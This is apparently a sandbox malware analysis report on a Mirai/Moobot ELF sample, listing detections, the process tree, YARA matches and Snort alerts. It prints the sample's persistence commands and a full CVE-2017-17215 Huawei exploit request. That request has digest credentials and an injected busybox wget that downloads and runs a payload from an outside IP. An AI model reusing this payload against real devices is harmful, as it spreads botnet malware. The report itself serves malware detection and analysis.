Edit tour

Linux Analysis Report
6lqMB7o2Ts.elf

Overview

General Information

Sample Name:	6lqMB7o2Ts.elf
Original Sample Name:	1f34c5bcd411c95d5bdff565afd27afd.elf
Analysis ID:	830828
MD5:	1f34c5bcd411c95d5bdff565afd27afd
SHA1:	39a1f8fff95e7c4d693d0d3fbc2d49749f3ba395
SHA256:	a9b25052579b7f41a1f985ed6d95f0eef2f00e8ad0e9a16dafad5ea38cb1b128
Tags:	32elfmipsmirai
Infos:

Detection

Mirai, Moobot

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Yara detected Mirai

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Moobot

Snort IDS alert for network traffic

Connects to many ports of the same IP (likely port scanning)

Uses known network protocols on non-standard ports

Sets full permissions to files and/or directories

Yara signature match

Executes the "mkdir" command used to create folders

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "chmod" command used to modify permissions

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Sample has stripped symbol table

Sample tries to set the executable flag

HTTP GET or POST without a user agent

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All domains contacted by the sample do not resolve. The sample is likely an old dropper which does no longer work.

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	830828
Start date and time:	2023-03-20 18:13:53 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 52s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample file name:	6lqMB7o2Ts.elf
Original Sample Name:	1f34c5bcd411c95d5bdff565afd27afd.elf
Detection:	MAL
Classification:	mal92.troj.linELF@0/0@105/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100

Runtime Messages

Command:	/tmp/6lqMB7o2Ts.elf
PID:	6230
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	^p
Standard Error:

Process Tree

system is lnxubuntu20

6lqMB7o2Ts.elf (PID: 6230, Parent: 6125, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/6lqMB7o2Ts.elf

6lqMB7o2Ts.elf New Fork (PID: 6232, Parent: 6230)

sh (PID: 6232, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/6lqMB7o2Ts.elf bin/systemd; chmod 777 bin/systemd"

sh New Fork (PID: 6234, Parent: 6232)

rm (PID: 6234, Parent: 6232, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/systemd

sh New Fork (PID: 6235, Parent: 6232)

mkdir (PID: 6235, Parent: 6232, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin

sh New Fork (PID: 6236, Parent: 6232)

mv (PID: 6236, Parent: 6232, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/6lqMB7o2Ts.elf bin/systemd

sh New Fork (PID: 6237, Parent: 6232)

chmod (PID: 6237, Parent: 6232, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/systemd

6lqMB7o2Ts.elf New Fork (PID: 6238, Parent: 6230)

6lqMB7o2Ts.elf New Fork (PID: 6240, Parent: 6238)

6lqMB7o2Ts.elf New Fork (PID: 6241, Parent: 6238)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
MooBot		No Attribution	https://blog.netlab.360.com/ddos-botnet-moobot-en/ https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b https://unit42.paloaltonetworks.com/moobot-d-link-devices/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
6lqMB7o2Ts.elf	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
6lqMB7o2Ts.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6lqMB7o2Ts.elf	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x11d6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11da8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11dbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11dd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11de4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11df8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11eac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ed4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11efc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

Memory Dumps

Source	Rule	Description	Author	Strings
6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x11d6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11da8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11dbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11dd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11de4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11df8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11eac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ed4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11efc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x11d6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11da8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11dbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11dd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11de4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11df8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11eac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ed4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11efc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: 6lqMB7o2Ts.elf PID: 6230	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: 6lqMB7o2Ts.elf PID: 6230	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x3e6a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3e7e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3e92:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3ea6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3eba:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3ece:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3ee2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3ef6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f0a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f1e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f32:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f46:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f5a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f6e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f82:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3f96:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3faa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3fbe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3fd2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3fe6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x3ffa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: 6lqMB7o2Ts.elf PID: 6240	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x6908:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x691c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6930:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6944:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6958:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x696c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6980:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6994:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x69a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x69bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x69d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x69e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x69f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6a98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Click to see the 4 entries

Snort Signatures

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 191.61.26.79

Timestamp:	192.168.2.23191.61.26.7952002372152835222 03/20/23-18:15:41.479492
SID:	2835222
Source Port:	52002
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.239.25.98

Timestamp:	192.168.2.2341.239.25.9858734372152835222 03/20/23-18:16:18.194286
SID:	2835222
Source Port:	58734
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 77.136.237.160

Timestamp:	192.168.2.2377.136.237.16045516372152835222 03/20/23-18:14:44.802279
SID:	2835222
Source Port:	45516
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 103.54.44.133

Timestamp:	192.168.2.23103.54.44.13350306372152835222 03/20/23-18:15:01.586540
SID:	2835222
Source Port:	50306
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 104.128.127.228

Timestamp:	192.168.2.23104.128.127.22846544372152835222 03/20/23-18:15:22.996810
SID:	2835222
Source Port:	46544
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.238.196.116

Timestamp:	192.168.2.2341.238.196.11641076372152835222 03/20/23-18:14:59.321194
SID:	2835222
Source Port:	41076
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 34.120.131.8

Timestamp:	192.168.2.2334.120.131.845438372152835222 03/20/23-18:15:29.072769
SID:	2835222
Source Port:	45438
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 94.187.108.185

Timestamp:	192.168.2.2394.187.108.18555228372152835222 03/20/23-18:15:36.209617
SID:	2835222
Source Port:	55228
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: unknown

DNS traffic detected: queries for: BC@^]B

System Summary

Malicious sample detected (through community Yara rule)

Source: 6lqMB7o2Ts.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6230.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6240.1.00007fd3fc400000.00007fd3fc414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: 6lqMB7o2Ts.elf PID: 6230, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
